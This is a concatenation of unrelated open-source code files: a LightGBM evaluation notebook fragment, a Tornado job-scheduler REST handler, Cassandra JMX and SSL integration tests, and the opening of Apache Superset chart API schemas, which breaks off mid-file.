cms.append(confusion_matrix(df2.iloc[valid_idx][target].values, oof[valid_idx].round()))
# Features imp
fold_importance_df2 = pd.DataFrame()
fold_importance_df2["Feature"] = features
fold_importance_df2["importance"] = clf.feature_importance()
fold_importance_df2["fold"] = nfold + 1
feature_importance_df2 = pd.concat([feature_importance_df2, fold_importance_df2], axis=0)
# Metrics
print(
'\nCV roc score : {0:.4f}, std: {1:.4f}.'.format(np.mean(roc_aucs), np.std(roc_aucs)),
'\nCV accuracy score : {0:.4f}, std: {1:.4f}.'.format(np.mean(accuracies), np.std(accuracies)),
'\nCV recall score : {0:.4f}, std: {1:.4f}.'.format(np.mean(recalls), np.std(recalls)),
'\nCV precision score : {0:.4f}, std: {1:.4f}.'.format(np.mean(precisions), np.std(precisions)),
'\nCV f1 score : {0:.4f}, std: {1:.4f}.'.format(np.mean(f1_scores), np.std(f1_scores))
)
#ROC
f = plt.figure(1)
plt.plot([0,1],[0,1],linestyle = '--',lw = 2,color = 'grey')
mean_tpr = np.mean(tprs, axis=0)
mean_auc = auc(mean_fpr, mean_tpr)
plt.plot(mean_fpr, mean_tpr, color='blue',
label=r'Mean ROC (AUC = %0.4f)' % (np.mean(roc_aucs)),lw=2, alpha=1)
plt.xlabel('False Positive Rate')
plt.ylabel('True Positive Rate')
plt.title('LGB ROC curve by folds')
plt.legend(loc="lower right")
# PR plt
g = plt.figure(2)
plt.plot([0,1],[1,0],linestyle = '--',lw = 2,color = 'grey')
y_real = np.concatenate(y_real)
y_proba = np.concatenate(y_proba)
precision, recall, _ = precision_recall_curve(y_real, y_proba)
plt.plot(recall, precision, color='blue',
label=r'Mean P|R')
plt.xlabel('Recall')
plt.ylabel('Precision')
plt.title('P|R curve by folds')
plt.legend(loc="lower left")
# Confusion maxtrix & metrics
plt.rcParams["axes.grid"] = False
cm = np.average(cms, axis=0)
default_names = [0,1]
plt.figure()
plot_confusion_matrix(cm,
classes=default_names,
title= 'LGB Confusion matrix [averaged/folds]')
plt.show()
# In[209]:
LGB_BO.max['params']
|
the-stack_106_14843
|
"""Handler for jobs endpoint."""
import json
import tornado.concurrent
import tornado.gen
import tornado.web
from ... import constants
from ... import utils
from . import base
class Handler(base.BaseHandler):
def _get_jobs(self):
"""Returns a dictionary for all jobs info.
It's a blocking operation.
"""
jobs = self.scheduler_manager.get_jobs()
return_json = []
for job in jobs:
return_json.append(self._build_job_dict(job))
return {'jobs': return_json}
def _build_job_dict(self, job):
"""Transforms apscheduler's job structure to a python dictionary.
:param Job job: An apscheduler.job.Job instance.
:return: dictionary for job info
:rtype: dict
"""
if job.next_run_time:
next_run_time = job.next_run_time.isoformat()
else:
next_run_time = ''
return_dict = {
'job_id': job.id,
'name': job.name,
'next_run_time': next_run_time,
'job_class_string': utils.get_job_name(job),
'pub_args': utils.get_job_args(job)}
return_dict.update(utils.get_cron_strings(job))
return return_dict
@tornado.concurrent.run_on_executor
def get_jobs(self):
"""Wrapper to run _get_jobs() on a thread executor.
:return: dictionary for jobs
A dictionary of jobs, e.g., :
{
jobs: [...]
}
:rtype: dict
"""
return self._get_jobs()
@tornado.gen.engine
def get_jobs_yield(self):
"""Wrapper for get_jobs in async mode."""
return_json = yield self.get_jobs()
self.finish(return_json)
def _get_job(self, job_id):
"""Returns a dictionary for a job info.
It's a blocking operation.
:param str job_id: Job id.
:return: dictionary for a job
:rtype: dict
"""
job = self.scheduler_manager.get_job(job_id)
if not job:
self.set_status(400)
return {'error': 'Job not found: %s' % job_id}
return self._build_job_dict(job)
@tornado.concurrent.run_on_executor
def get_job(self, job_id):
"""Wrapper to run _get_jobs() on a thread executor.
:param str job_id: Job id.
:return: A dictionary of a job.
:rtype: dict
"""
return self._get_job(job_id)
@tornado.gen.engine
def get_job_yield(self, job_id):
"""Wrapper for get_job() to run in async mode.
:param str job_id: Job id.
"""
return_json = yield self.get_job(job_id)
self.finish(return_json)
@tornado.web.removeslash
@tornado.web.asynchronous
@tornado.gen.engine
def get(self, job_id=None):
"""Returns a job or multiple jobs.
Handles two endpoints:
GET /api/v1/jobs (when job_id == None)
GET /api/v1/jobs/{job_id} (when job_id != None)
:param str job_id: String for job id.
"""
if job_id is None:
self.get_jobs_yield()
else:
self.get_job_yield(job_id)
@tornado.web.removeslash
def post(self):
"""Adds a job.
add_job() is a non-blocking operation, but audit log is a blocking operation.
Handles an endpoint:
POST /api/v1/jobs
"""
self._validate_post_data()
# This is non-blocking function.
# It returns job_id immediately.
job_id = self.scheduler_manager.add_job(**self.json_args)
# Blocking operation.
self.datastore.add_audit_log(job_id, self.json_args['name'],
constants.AUDIT_LOG_ADDED, self.username)
response = {
'job_id': job_id}
self.set_status(201)
self.write(response)
def _delete_job(self, job_id):
"""Deletes a job.
It's a blocking operation.
:param str job_id: String for a job id.
"""
job = self._get_job(job_id)
self.scheduler_manager.remove_job(job_id)
self.datastore.add_audit_log(job_id, job['name'], constants.AUDIT_LOG_DELETED,
self.username, json.dumps(job))
@tornado.concurrent.run_on_executor
def delete_job(self, job_id):
"""Wrapper for _delete_job() to run on a threaded executor."""
self._delete_job(job_id)
@tornado.gen.engine
def delete_job_yield(self, job_id):
yield self.delete_job(job_id)
@tornado.web.removeslash
@tornado.web.asynchronous
@tornado.gen.engine
def delete(self, job_id):
"""Deletes a job.
Handles an endpoint:
DELETE /api/v1/jobs/{job_id}
:param str job_id: Job id
"""
self.delete_job_yield(job_id)
response = {
'job_id': job_id}
self.set_status(200)
self.finish(response)
def _generate_description_for_item(self, old_job, new_job, item):
"""Returns a diff for one field of a job.
:param dict old_job: Dict for old job.
:param dict new_job: Dict for new job after modification.
:return: String for description.
:rtype: str
"""
if old_job[item] != new_job[item]:
return ('<b>%s</b>: <font color="red">%s</font> =>'
' <font color="green">%s</font><br>') % (item, old_job[item], new_job[item])
return ''
def _generate_description_for_modify(self, old_job, new_job):
"""Generates description text after modifying a job.
:param dict old_job: Dict for old job.
:param dict new_job: Dict for new job after modification.
:return: String for description.
:rtype: str
"""
description = ''
items = [
'name',
'job_class_string',
'pub_args',
'minute',
'hour',
'day',
'month',
'day_of_week'
]
for item in items:
description += self._generate_description_for_item(old_job, new_job, item)
return description
def _modify_job(self, job_id):
"""Modifies a job's info.
This is a blocking operation.
:param str job_id: String for a job id.
"""
old_job = self._get_job(job_id)
self.scheduler_manager.modify_job(job_id, **self.json_args)
job = self._get_job(job_id)
# Audit log
self.datastore.add_audit_log(
job_id, job['name'], constants.AUDIT_LOG_MODIFIED,
self.username, self._generate_description_for_modify(old_job, job))
@tornado.concurrent.run_on_executor
def modify_job(self, job_id):
"""Wrapper for _modify_job() to run on threaded executor.
:param str job_id: String for a job id.
"""
self._modify_job(job_id)
@tornado.gen.engine
def modify_job_yield(self, job_id):
"""Wrapper for modify_job() to run in async mode.
:param str job_id: Job id.
"""
yield self.modify_job(job_id)
@tornado.web.removeslash
@tornado.web.asynchronous
@tornado.gen.engine
def put(self, job_id):
"""Modifies a job.
Handles an endpoint:
PUT /api/v1/jobs/{job_id}
:param str job_id: Job id.
"""
self._validate_post_data()
self.modify_job_yield(job_id)
response = {
'job_id': job_id}
self.set_status(200)
self.finish(response)
@tornado.web.removeslash
def patch(self, job_id):
"""Pauses a job.
pause_job() is a non-blocking operation, but audit log is a blocking operation.
Handles an endpoint:
PATCH /api/v1/jobs/{job_id}
:param str job_id: Job id.
"""
# This is non-blocking function.
# It returns job_id immediately.
self.scheduler_manager.pause_job(job_id)
# Blocking operation.
job = self._get_job(job_id)
self.datastore.add_audit_log(job_id, job['name'], constants.AUDIT_LOG_PAUSED, self.username)
response = {
'job_id': job_id}
self.set_status(200)
self.write(response)
@tornado.web.removeslash
def options(self, job_id):
"""Resumes a job.
resume_job() is a non-blocking operation, but audit log is a blocking operation.
Handles an endpoint:
OPTIONS /api/v1/jobs/{job_id}
:param str job_id: Job id.
"""
# This is non-blocking function.
# It returns job_id immediately.
self.scheduler_manager.resume_job(job_id)
# Blocking operation.
job = self._get_job(job_id)
self.datastore.add_audit_log(job_id, job['name'], constants.AUDIT_LOG_RESUMED,
self.username)
response = {
'job_id': job_id}
self.set_status(200)
self.write(response)
def _validate_post_data(self):
"""Validates POST data for adding a job.
:return: a dictionary that serves as kwargs for Scheduler.add_job()
:rtype: dict
:raises: HTTPError(400: Bad arguments).
"""
all_required_fields = ['name', 'job_class_string']
for field in all_required_fields:
if field not in self.json_args:
raise tornado.web.HTTPError(400, reason='Require this parameter: %s' % field)
at_least_one_required_fields = ['month', 'day', 'hour', 'minute', 'day_of_week']
valid_cron_string = False
for field in at_least_one_required_fields:
if field in self.json_args:
valid_cron_string = True
break
if not valid_cron_string:
raise tornado.web.HTTPError(400, reason=('Require at least one of following parameters:'
' %s' % str(at_least_one_required_fields)))
|
the-stack_106_14844
|
import os
import time
import pytest
import parse
import re
import logging
import ccmlib.common
from ccmlib.node import ToolError
from dtest import Tester
from tools.jmxutils import (JolokiaAgent, enable_jmx_ssl, make_mbean,
remove_perf_disable_shared_mem)
from tools.misc import generate_ssl_stores
since = pytest.mark.since
logger = logging.getLogger(__name__)
class TestJMX(Tester):
@pytest.fixture(autouse=True)
def fixture_add_additional_log_patterns(self, fixture_dtest_setup):
fixture_dtest_setup.ignore_log_patterns = (
r'Failed to properly handshake with peer.* Closing the channel'
)
def test_netstats(self):
"""
Check functioning of nodetool netstats, especially with restarts.
@jira_ticket CASSANDRA-8122, CASSANDRA-6577
"""
#
cluster = self.cluster
cluster.populate(3).start(wait_for_binary_proto=True)
node1, node2, node3 = cluster.nodelist()
node1.stress(['write', 'n=500K', 'no-warmup', '-schema', 'replication(factor=3)'])
node1.flush()
node1.stop(gently=False)
with pytest.raises(ToolError, message="ConnectException: 'Connection refused( \(Connection refused\))?'."):
node1.nodetool('netstats')
# don't wait; we're testing for when nodetool is called on a node mid-startup
node1.start(wait_for_binary_proto=False)
# until the binary interface is available, try `nodetool netstats`
binary_interface = node1.network_interfaces['binary']
time_out_at = time.time() + 30
running = False
while (not running and time.time() <= time_out_at):
running = ccmlib.common.check_socket_listening(binary_interface, timeout=0.5)
try:
node1.nodetool('netstats')
except Exception as e:
assert 'java.lang.reflect.UndeclaredThrowableException' not in str(e), \
'Netstats failed with UndeclaredThrowableException (CASSANDRA-8122)'
if not isinstance(e, ToolError):
raise
else:
assert re.search("ConnectException: 'Connection refused( \(Connection refused\))?'.", repr(e))
assert running, 'node1 never started'
def test_table_metric_mbeans(self):
"""
Test some basic table metric mbeans with simple writes.
"""
cluster = self.cluster
cluster.populate(3)
node1, node2, node3 = cluster.nodelist()
remove_perf_disable_shared_mem(node1)
cluster.start(wait_for_binary_proto=True)
version = cluster.version()
node1.stress(['write', 'n=10K', 'no-warmup', '-schema', 'replication(factor=3)'])
typeName = "ColumnFamily" if version <= '2.2.X' else 'Table'
logger.debug('Version {} typeName {}'.format(version, typeName))
# TODO the keyspace and table name are capitalized in 2.0
memtable_size = make_mbean('metrics', type=typeName, keyspace='keyspace1', scope='standard1',
name='AllMemtablesHeapSize')
disk_size = make_mbean('metrics', type=typeName, keyspace='keyspace1', scope='standard1',
name='LiveDiskSpaceUsed')
sstable_count = make_mbean('metrics', type=typeName, keyspace='keyspace1', scope='standard1',
name='LiveSSTableCount')
with JolokiaAgent(node1) as jmx:
mem_size = jmx.read_attribute(memtable_size, "Value")
assert int(mem_size) > 10000
on_disk_size = jmx.read_attribute(disk_size, "Count")
assert int(on_disk_size) == 0
node1.flush()
on_disk_size = jmx.read_attribute(disk_size, "Count")
assert int(on_disk_size) > 10000
sstables = jmx.read_attribute(sstable_count, "Value")
assert int(sstables) >= 1
@since('3.0')
def test_mv_metric_mbeans_release(self):
"""
Test that the right mbeans are created and released when creating mvs
"""
cluster = self.cluster
cluster.populate(1)
node = cluster.nodelist()[0]
remove_perf_disable_shared_mem(node)
cluster.start(wait_for_binary_proto=True)
node.run_cqlsh(cmds="""
CREATE KEYSPACE mvtest WITH REPLICATION = { 'class' : 'SimpleStrategy', 'replication_factor': 1 };
CREATE TABLE mvtest.testtable (
foo int,
bar text,
baz text,
PRIMARY KEY (foo, bar)
);
CREATE MATERIALIZED VIEW mvtest.testmv AS
SELECT foo, bar, baz FROM mvtest.testtable WHERE
foo IS NOT NULL AND bar IS NOT NULL AND baz IS NOT NULL
PRIMARY KEY (foo, bar, baz);""")
table_memtable_size = make_mbean('metrics', type='Table', keyspace='mvtest', scope='testtable',
name='AllMemtablesHeapSize')
table_view_read_time = make_mbean('metrics', type='Table', keyspace='mvtest', scope='testtable',
name='ViewReadTime')
table_view_lock_time = make_mbean('metrics', type='Table', keyspace='mvtest', scope='testtable',
name='ViewLockAcquireTime')
mv_memtable_size = make_mbean('metrics', type='Table', keyspace='mvtest', scope='testmv',
name='AllMemtablesHeapSize')
mv_view_read_time = make_mbean('metrics', type='Table', keyspace='mvtest', scope='testmv',
name='ViewReadTime')
mv_view_lock_time = make_mbean('metrics', type='Table', keyspace='mvtest', scope='testmv',
name='ViewLockAcquireTime')
missing_metric_message = "Table metric %s should have been registered after creating table %s" \
"but wasn't!"
with JolokiaAgent(node) as jmx:
assert jmx.read_attribute(table_memtable_size, "Value") is not None, \
missing_metric_message.format("AllMemtablesHeapSize", "testtable")
assert jmx.read_attribute(table_view_read_time, "Count") is not None, \
missing_metric_message.format("ViewReadTime", "testtable")
assert jmx.read_attribute(table_view_lock_time, "Count") is not None, \
missing_metric_message.format("ViewLockAcquireTime", "testtable")
assert jmx.read_attribute(mv_memtable_size, "Value") is not None, \
missing_metric_message.format("AllMemtablesHeapSize", "testmv")
with pytest.raises(Exception, match=".*InstanceNotFoundException.*"):
jmx.read_attribute(mbean=mv_view_read_time, attribute="Count", verbose=False)
with pytest.raises(Exception, match=".*InstanceNotFoundException.*"):
jmx.read_attribute(mbean=mv_view_lock_time, attribute="Count", verbose=False)
node.run_cqlsh(cmds="DROP KEYSPACE mvtest;")
with JolokiaAgent(node) as jmx:
with pytest.raises(Exception, match=".*InstanceNotFoundException.*"):
jmx.read_attribute(mbean=table_memtable_size, attribute="Value", verbose=False)
with pytest.raises(Exception, match=".*InstanceNotFoundException.*"):
jmx.read_attribute(mbean=table_view_lock_time, attribute="Count", verbose=False)
with pytest.raises(Exception, match=".*InstanceNotFoundException.*"):
jmx.read_attribute(mbean=table_view_read_time, attribute="Count", verbose=False)
with pytest.raises(Exception, match=".*InstanceNotFoundException.*"):
jmx.read_attribute(mbean=mv_memtable_size, attribute="Value", verbose=False)
with pytest.raises(Exception, match=".*InstanceNotFoundException.*"):
jmx.read_attribute(mbean=mv_view_lock_time, attribute="Count", verbose=False)
with pytest.raises(Exception, match=".*InstanceNotFoundException.*"):
jmx.read_attribute(mbean=mv_view_read_time, attribute="Count", verbose=False)
def test_compactionstats(self):
"""
@jira_ticket CASSANDRA-10504
@jira_ticket CASSANDRA-10427
Test that jmx MBean used by nodetool compactionstats
properly updates the progress of a compaction
"""
cluster = self.cluster
cluster.populate(1)
node = cluster.nodelist()[0]
remove_perf_disable_shared_mem(node)
cluster.start(wait_for_binary_proto=True)
# Run a quick stress command to create the keyspace and table
node.stress(['write', 'n=1', 'no-warmup'])
# Disable compaction on the table
node.nodetool('disableautocompaction keyspace1 standard1')
node.nodetool('setcompactionthroughput 1')
node.stress(['write', 'n=150K', 'no-warmup'])
node.flush()
# Run a major compaction. This will be the compaction whose
# progress we track.
node.nodetool_process('compact')
# We need to sleep here to give compaction time to start
# Why not do something smarter? Because if the bug regresses,
# we can't rely on jmx to tell us that compaction started.
time.sleep(5)
compaction_manager = make_mbean('db', type='CompactionManager')
with JolokiaAgent(node) as jmx:
progress_string = jmx.read_attribute(compaction_manager, 'CompactionSummary')[0]
# Pause in between reads
# to allow compaction to move forward
time.sleep(2)
updated_progress_string = jmx.read_attribute(compaction_manager, 'CompactionSummary')[0]
var = 'Compaction@{uuid}(keyspace1, standard1, {progress}/{total})bytes'
progress = int(parse.search(var, progress_string).named['progress'])
updated_progress = int(parse.search(var, updated_progress_string).named['progress'])
logger.debug(progress_string)
logger.debug(updated_progress_string)
# We want to make sure that the progress is increasing,
# and that values other than zero are displayed.
assert updated_progress > progress
assert progress >= 0
assert updated_progress > 0
# Block until the major compaction is complete
# Otherwise nodetool will throw an exception
# Give a timeout, in case compaction is broken
# and never ends.
start = time.time()
max_query_timeout = 600
logger.debug("Waiting for compaction to finish:")
while (len(jmx.read_attribute(compaction_manager, 'CompactionSummary')) > 0) and (
time.time() - start < max_query_timeout):
logger.debug(jmx.read_attribute(compaction_manager, 'CompactionSummary'))
time.sleep(2)
@since('2.2')
def test_phi(self):
"""
Check functioning of nodetool failuredetector.
@jira_ticket CASSANDRA-9526
"""
cluster = self.cluster
cluster.populate(3).start(wait_for_binary_proto=True)
node1, node2, node3 = cluster.nodelist()
stdout = node1.nodetool("failuredetector").stdout
phivalues = stdout.splitlines()
endpoint1values = phivalues[1].split()
endpoint2values = phivalues[2].split()
endpoint1 = endpoint1values[0][1:-1]
endpoint2 = endpoint2values[0][1:-1]
assert '127.0.0.2' in [endpoint1, endpoint2]
assert '127.0.0.3' in [endpoint1, endpoint2]
endpoint1phi = float(endpoint1values[1])
endpoint2phi = float(endpoint2values[1])
max_phi = 2.0
assert endpoint1phi > 0.0
assert endpoint1phi < max_phi
assert endpoint2phi > 0.0
assert endpoint2phi < max_phi
@since('4.0')
def test_set_get_batchlog_replay_throttle(self):
"""
@jira_ticket CASSANDRA-13614
Test that batchlog replay throttle can be set and get through JMX
"""
cluster = self.cluster
cluster.populate(2)
node = cluster.nodelist()[0]
remove_perf_disable_shared_mem(node)
cluster.start()
# Set and get throttle with JMX, ensuring that the rate change is logged
with JolokiaAgent(node) as jmx:
mbean = make_mbean('db', 'StorageService')
jmx.write_attribute(mbean, 'BatchlogReplayThrottleInKB', 4096)
assert len(node.grep_log('Updating batchlog replay throttle to 4096 KB/s, 2048 KB/s per endpoint',
filename='debug.log')) > 0
assert 4096 == jmx.read_attribute(mbean, 'BatchlogReplayThrottleInKB')
@since('3.9')
class TestJMXSSL(Tester):
keystore_password = 'cassandra'
truststore_password = 'cassandra'
def truststore(self):
return os.path.join(self.fixture_dtest_setup.test_path, 'truststore.jks')
def keystore(self):
return os.path.join(self.fixture_dtest_setup.test_path, 'keystore.jks')
def test_jmx_connection(self):
"""
Check connecting with a JMX client (via nodetool) where SSL is enabled for JMX
@jira_ticket CASSANDRA-12109
"""
cluster = self._populateCluster(require_client_auth=False)
node = cluster.nodelist()[0]
cluster.start()
self.assert_insecure_connection_rejected(node)
node.nodetool("info --ssl -Djavax.net.ssl.trustStore={ts} -Djavax.net.ssl.trustStorePassword={ts_pwd}"
.format(ts=self.truststore(), ts_pwd=self.truststore_password))
def test_require_client_auth(self):
"""
Check connecting with a JMX client (via nodetool) where SSL is enabled and
client certificate auth is also configured
@jira_ticket CASSANDRA-12109
"""
cluster = self._populateCluster(require_client_auth=True)
node = cluster.nodelist()[0]
cluster.start()
self.assert_insecure_connection_rejected(node)
# specifying only the truststore containing the server cert should fail
with pytest.raises(ToolError, match=".*SSLHandshakeException.*"):
node.nodetool("info --ssl -Djavax.net.ssl.trustStore={ts} -Djavax.net.ssl.trustStorePassword={ts_pwd}"
.format(ts=self.truststore(), ts_pwd=self.truststore_password))
# when both truststore and a keystore containing the client key are supplied, connection should succeed
node.nodetool(
"info --ssl -Djavax.net.ssl.trustStore={ts} -Djavax.net.ssl.trustStorePassword={ts_pwd} -Djavax.net.ssl.keyStore={ks} -Djavax.net.ssl.keyStorePassword={ks_pwd}"
.format(ts=self.truststore(), ts_pwd=self.truststore_password, ks=self.keystore(),
ks_pwd=self.keystore_password))
def assert_insecure_connection_rejected(self, node):
"""
Attempts to connect to JMX (via nodetool) without any client side ssl parameters, expecting failure
"""
with pytest.raises(ToolError):
node.nodetool("info")
def _populateCluster(self, require_client_auth=False):
cluster = self.cluster
cluster.populate(1)
generate_ssl_stores(self.fixture_dtest_setup.test_path)
if require_client_auth:
ts = self.truststore()
ts_pwd = self.truststore_password
else:
ts = None
ts_pwd = None
enable_jmx_ssl(cluster.nodelist()[0],
require_client_auth=require_client_auth,
keystore=self.keystore(),
keystore_password=self.keystore_password,
truststore=ts,
truststore_password=ts_pwd)
return cluster
|
the-stack_106_14846
|
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
# pylint: disable=too-many-lines
from typing import Any, Dict
from flask_babel import gettext as _
from marshmallow import EXCLUDE, fields, post_load, Schema, validate
from marshmallow.validate import Length, Range
from marshmallow_enum import EnumField
from superset import app
from superset.common.chart_data import ChartDataResultFormat, ChartDataResultType
from superset.common.query_context import QueryContext
from superset.db_engine_specs.base import builtin_time_grains
from superset.utils import schema as utils
from superset.utils.core import (
AnnotationType,
FilterOperator,
PostProcessingBoxplotWhiskerType,
PostProcessingContributionOrientation,
TimeRangeEndpoint,
)
config = app.config
#
# RISON/JSON schemas for query parameters
#
get_delete_ids_schema = {"type": "array", "items": {"type": "integer"}}
width_height_schema = {
"type": "array",
"items": {"type": "integer"},
}
thumbnail_query_schema = {
"type": "object",
"properties": {"force": {"type": "boolean"}},
}
screenshot_query_schema = {
"type": "object",
"properties": {
"force": {"type": "boolean"},
"window_size": width_height_schema,
"thumb_size": width_height_schema,
},
}
get_export_ids_schema = {"type": "array", "items": {"type": "integer"}}
get_fav_star_ids_schema = {"type": "array", "items": {"type": "integer"}}
#
# Column schema descriptions
#
slice_name_description = "The name of the chart."
description_description = "A description of the chart propose."
viz_type_description = "The type of chart visualization used."
owners_description = (
"Owner are users ids allowed to delete or change this chart. "
"If left empty you will be one of the owners of the chart."
)
params_description = (
"Parameters are generated dynamically when clicking the save "
"or overwrite button in the explore view. "
"This JSON object for power users who may want to alter specific parameters."
)
query_context_description = (
"The query context represents the queries that need to run "
"in order to generate the data the visualization, and in what "
"format the data should be returned."
)
query_context_generation_description = (
"The query context generation represents whether the query_context"
"is user generated or not so that it does not update user modfied"
"state."
)
cache_timeout_description = (
"Duration (in seconds) of the caching timeout "
"for this chart. Note this defaults to the datasource/table"
" timeout if undefined."
)
datasource_id_description = (
"The id of the dataset/datasource this new chart will use. "
"A complete datasource identification needs `datasouce_id` "
"and `datasource_type`."
)
datasource_uid_description = (
"The uid of the dataset/datasource this new chart will use. "
"A complete datasource identification needs `datasouce_uid` "
)
datasource_type_description = (
"The type of dataset/datasource identified on `datasource_id`."
)
datasource_name_description = "The datasource name."
dashboards_description = "A list of dashboards to include this new chart to."
changed_on_description = "The ISO date that the chart was last changed."
slice_url_description = "The URL of the chart."
form_data_description = (
"Form data from the Explore controls used to form the chart's data query."
)
description_markeddown_description = "Sanitized HTML version of the chart description."
owners_name_description = "Name of an owner of the chart."
#
# OpenAPI method specification overrides
#
openapi_spec_methods_override = {
"get": {"get": {"description": "Get a chart detail information."}},
"get_list": {
"get": {
"description": "Get a list of charts, use Rison or JSON query "
"parameters for filtering, sorting, pagination and "
" for selecting specific columns and metadata.",
}
},
"info": {
"get": {
"description": "Several metadata information about chart API endpoints.",
}
},
"related": {
"get": {
"description": "Get a list of all possible owners for a chart. "
"Use `owners` has the `column_name` parameter"
}
},
}
class ChartEntityResponseSchema(Schema):
"""
Schema for a chart object
"""
slice_id = fields.Integer()
slice_name = fields.String(description=slice_name_description)
cache_timeout = fields.Integer(description=cache_timeout_description)
changed_on = fields.String(description=changed_on_description)
modified = fields.String()
description = fields.String(description=description_description)
description_markeddown = fields.String(
description=description_markeddown_description
)
form_data = fields.Dict(description=form_data_description)
slice_url = fields.String(description=slice_url_description)
class ChartPostSchema(Schema):
"""
Schema to add a new chart.
"""
slice_name = fields.String(
description=slice_name_description, required=True, validate=Length(1, 250)
)
description = fields.String(description=description_description, allow_none=True)
viz_type = fields.String(
description=viz_type_description,
validate=Length(0, 250),
example=["bar", "line_multi", "area", "table"],
)
owners = fields.List(fields.Integer(description=owners_description))
params = fields.String(
description=params_description, allow_none=True, validate=utils.validate_json
)
query_context = fields.String(
description=query_context_description,
allow_none=True,
validate=utils.validate_json,
)
query_context_generation = fields.Boolean(
description=query_context_generation_description, allow_none=True
)
cache_timeout = fields.Integer(
description=cache_timeout_description, allow_none=True
)
datasource_id = fields.Integer(description=datasource_id_description, required=True)
datasource_type = fields.String(
description=datasource_type_description,
validate=validate.OneOf(choices=("druid", "table", "view")),
required=True,
)
datasource_name = fields.String(
description=datasource_name_description, allow_none=True
)
dashboards = fields.List(fields.Integer(description=dashboards_description))
class ChartPutSchema(Schema):
"""
Schema to update or patch a chart
"""
slice_name = fields.String(
description=slice_name_description, allow_none=True, validate=Length(0, 250)
)
description = fields.String(description=description_description, allow_none=True)
viz_type = fields.String(
description=viz_type_description,
allow_none=True,
validate=Length(0, 250),
example=["bar", "line_multi", "area", "table"],
)
owners = fields.List(fields.Integer(description=owners_description))
params = fields.String(description=params_description, allow_none=True)
query_context = fields.String(
description=query_context_description, allow_none=True
)
query_context_generation = fields.Boolean(
description=query_context_generation_description, allow_none=True
)
cache_timeout = fields.Integer(
description=cache_timeout_description, allow_none=True
)
datasource_id = fields.Integer(
description=datasource_id_description, allow_none=True
)
datasource_type = fields.String(
description=datasource_type_description,
validate=validate.OneOf(choices=("druid", "table", "view")),
allow_none=True,
)
dashboards = fields.List(fields.Integer(description=dashboards_description))
class ChartGetDatasourceObjectDataResponseSchema(Schema):
datasource_id = fields.Integer(description="The datasource identifier")
datasource_type = fields.Integer(description="The datasource type")
class ChartGetDatasourceObjectResponseSchema(Schema):
label = fields.String(description="The name of the datasource")
value = fields.Nested(ChartGetDatasourceObjectDataResponseSchema)
class ChartGetDatasourceResponseSchema(Schema):
count = fields.Integer(description="The total number of datasources")
result = fields.Nested(ChartGetDatasourceObjectResponseSchema)
class ChartCacheScreenshotResponseSchema(Schema):
cache_key = fields.String(description="The cache key")
chart_url = fields.String(description="The url to render the chart")
image_url = fields.String(description="The url to fetch the screenshot")
class ChartDataColumnSchema(Schema):
column_name = fields.String(
description="The name of the target column", example="mycol",
)
type = fields.String(description="Type of target column", example="BIGINT")
class ChartDataAdhocMetricSchema(Schema):
"""
Ad-hoc metrics are used to define metrics outside the datasource.
"""
expressionType = fields.String(
description="Simple or SQL metric",
required=True,
validate=validate.OneOf(choices=("SIMPLE", "SQL")),
example="SQL",
)
aggregate = fields.String(
description="Aggregation operator. Only required for simple expression types.",
validate=validate.OneOf(
choices=("AVG", "COUNT", "COUNT_DISTINCT", "MAX", "MIN", "SUM")
),
)
column = fields.Nested(ChartDataColumnSchema)
sqlExpression = fields.String(
description="The metric as defined by a SQL aggregate expression. "
"Only required for SQL expression type.",
example="SUM(weight * observations) / SUM(weight)",
)
label = fields.String(
description="Label for the metric. Is automatically generated unless "
"hasCustomLabel is true, in which case label must be defined.",
example="Weighted observations",
)
hasCustomLabel = fields.Boolean(
description="When false, the label will be automatically generated based on "
"the aggregate expression. When true, a custom label has to be "
"specified.",
example=True,
)
optionName = fields.String(
description="Unique identifier. Can be any string value, as long as all "
"metrics have a unique identifier. If undefined, a random name "
"will be generated.",
example="metric_aec60732-fac0-4b17-b736-93f1a5c93e30",
)
timeGrain = fields.String(
description="Optional time grain for temporal filters", example="PT1M",
)
isExtra = fields.Boolean(
description="Indicates if the filter has been added by a filter component as "
"opposed to being a part of the original query."
)
class ChartDataAggregateConfigField(fields.Dict):
def __init__(self) -> None:
super().__init__(
description="The keys are the name of the aggregate column to be created, "
"and the values specify the details of how to apply the "
"aggregation. If an operator requires additional options, "
"these can be passed here to be unpacked in the operator call. The "
"following numpy operators are supported: average, argmin, argmax, cumsum, "
"cumprod, max, mean, median, nansum, nanmin, nanmax, nanmean, nanmedian, "
"min, percentile, prod, product, std, sum, var. Any options required by "
"the operator can be passed to the `options` object.\n"
"\n"
"In the example, a new column `first_quantile` is created based on values "
"in the column `my_col` using the `percentile` operator with "
"the `q=0.25` parameter.",
example={
"first_quantile": {
"operator": "percentile",
"column": "my_col",
"options": {"q": 0.25},
}
},
)
class ChartDataPostProcessingOperationOptionsSchema(Schema):
pass
class ChartDataAggregateOptionsSchema(ChartDataPostProcessingOperationOptionsSchema):
"""
Aggregate operation config.
"""
groupby = (
fields.List(
fields.String(
allow_none=False, description="Columns by which to group by",
),
minLength=1,
required=True,
),
)
aggregates = ChartDataAggregateConfigField()
class ChartDataRollingOptionsSchema(ChartDataPostProcessingOperationOptionsSchema):
"""
Rolling operation config.
"""
columns = (
fields.Dict(
description="columns on which to perform rolling, mapping source column to "
"target column. For instance, `{'y': 'y'}` will replace the "
"column `y` with the rolling value in `y`, while `{'y': 'y2'}` "
"will add a column `y2` based on rolling values calculated "
"from `y`, leaving the original column `y` unchanged.",
example={"weekly_rolling_sales": "sales"},
),
)
rolling_type = fields.String(
description="Type of rolling window. Any numpy function will work.",
validate=validate.OneOf(
choices=(
"average",
"argmin",
"argmax",
"cumsum",
"cumprod",
"max",
"mean",
"median",
"nansum",
"nanmin",
"nanmax",
"nanmean",
"nanmedian",
"nanpercentile",
"min",
"percentile",
"prod",
"product",
"std",
"sum",
"var",
)
),
required=True,
example="percentile",
)
window = fields.Integer(
description="Size of the rolling window in days.", required=True, example=7,
)
rolling_type_options = fields.Dict(
desctiption="Optional options to pass to rolling method. Needed for "
"e.g. quantile operation.",
example={},
)
center = fields.Boolean(
